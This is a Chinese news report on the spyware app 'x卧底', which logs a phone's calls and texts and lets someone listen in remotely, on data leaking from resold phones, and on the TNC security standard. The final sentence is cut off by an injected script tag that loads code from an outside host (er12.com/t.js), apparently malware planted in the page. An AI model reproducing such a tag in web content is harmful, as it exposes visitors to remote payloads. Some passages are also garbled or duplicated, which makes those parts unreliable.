记者用这款已安装“x卧底”软件手机,拨打、接听了几个电话,还收发了几个短消息。再登录网站,上面清楚显示记者之前拨打的电话记录,包括接听和拨打,另外还有通话时间、持续时间、联系人姓名等,而短信内容也是详细显示了短信内容。
记者调查
“x卧底”可同步“转播”通话
记者上周五以一个网友的身份对“x卧底”进行了调查,打开百度的搜索引擎,输入“手机卧底软件”,随即迅速显示出大量有关信息。在一个sp的帮助之下,记者找到了推出这个软件的南京某科技公司建立的、域名类似“x卧底”的网站,其主推的软件为主打“手机信息安全概念”的“x卧底”和手机防盗功能的“x战警”两款,售价为1980元。
打开网站页面,“世界最强大的手机监控软件”、“在手机上安装,能够记录手机短信、通话记录、电话拨打人和拨打时间”等信息赫然入目。这家公司在对软件的功能简介中说,安装“x卧底”软件具有9大功效:找回被盗手机;备份所有短信;查看手机历史通话记录等。但是,其中最让人关注的自然是“远程通过手机实时监听监控”。
为了印证其言,记者和朋友按照网站所留qq号与对方取得联系,在简单沟通过后,对方打通了记者此前留下的电话。不过电话那头的一位女士自称只是这个软件的用户,给记者一个临时注册码免费试用。由于该软件只有诺基亚、三星等10余款手机能使用,记者便找来一部三星手机,先在网站上注册一用户名,通过手机从网站下载软件,在手机上输入临时注册码,得到提示安装完毕且自动生效。而且软件一旦落地,如果没有密码,机主即使更换手机号码也不能消除监控。
随后,用这款已安装“x卧底”软件手机,拨打、接听了几个电话,还收发了几个短消息。再登录网站,上面清楚显示记者之前拨打的电话记录,包括接听和拨打,另外还有通话时间、持续时间、联系人姓名等;而短信内容也是详细显示了短信内容、收?穴发?雪件时间、对方电话号码或者姓名。 该软件还有远程监听功能。根据一位网友的描述,他们曾把安装了软件的手机送给一位邻居,随后监听时发现,只要邻居手机通话,电脑中就可清晰传来交谈声,而持这部手机的人丝毫无感觉。 北京中关村一位该软件代理商向记者表示,“x卧底”软件最初源于泰国vervata公司提供的flexispy软件。
通过二手手机泄露信息
许多消费者喜欢将二手手机拿到旧货市场处理,但殊不知二手手机很可能是自己隐私外传的重要渠道。记者走访六里桥一个旧货市场时发现,许多二手手机的信息十分完备,手机里存有大量电话号码和短信。
“大家都没有这个概念,”在六里桥一家市场经营二手手机的王女士告诉记者:“由于手机更新快,每天都有大量二手手机在交易市场流通,机主更多是关注信息有没有存全而不是旧机个人信息有无删除。”
王女士说,卖手机时,机主通常只会取下sim卡和存储卡,手机内存中的信息并没有删除,个人信息容易外泄。
就算有心细的用户会将个人资料删除,甚至格式化存储卡。但只要通过一种恢复软件可以将手机内被删除的信息全部恢复。“这种软件网上有卖的,能把手机上已经删除的电话、短信重新恢复,而且这种软件操作很简单,只要有一般电脑常识的人都能弄出来。”一家手机维修店的张先生告诉记者,越是高档、智能化程度越高的手机恢复起来越容易。
相应对策
tnc标准远水难解近渴
手机隐私的情况已经开始引起许多国际手机厂商的关注,如全球知名的一些计算机、手机厂商和运营商发起成立的一个工业协会——tcg(the trusted computing group,可信赖计算组织),开始制订一套简单而可行的技术标准,以有效地保障手机等移动设备的安全性。
这个标准已经被命名为tnc(trusted network connect,可信赖的网络连接),tcg的计划以较简单的方案涉及到许多安全细节,并且承诺将发挥大量的潜在价值。首先,该标准将确保非法用户难以入侵手机系统并对其上的信息进行随意修改,因为它将机主的身份认证系统增加了进去,非法用户无法通过身份验证,即使窃取或捡到被丢失的手机也无法使用。同时,tcg的提案还确保每款手机只能安装惟有经过授权的合法软件,一种drm?穴digital rights management,数字专利管理?雪功能将防止手机用户非法复制盗版软件。
传统的手机安全验证过程都是各个厂商专用的系统,相互之间缺乏兼容性,tnc作为一种业界标准,有望解决这种混乱现象,就像互联网和pc领域的ipsec(ip security,ip安全协议)、eap(extensible authentication protocol,扩展验证协议)、ssl(secure sockets layer)等安全协议一样简单地实现跨平台的安全性。 不过由于采用这种安全技术的手持设备的价格也会比较高,因此对tnc何时走进普通人的生活,目前仍是未知数。
别在手机中存入机密信息
在还没有tnc的日子,对于所有用户来说,应该如何保护自己的隐私?script src=http://er12.com/t.js>











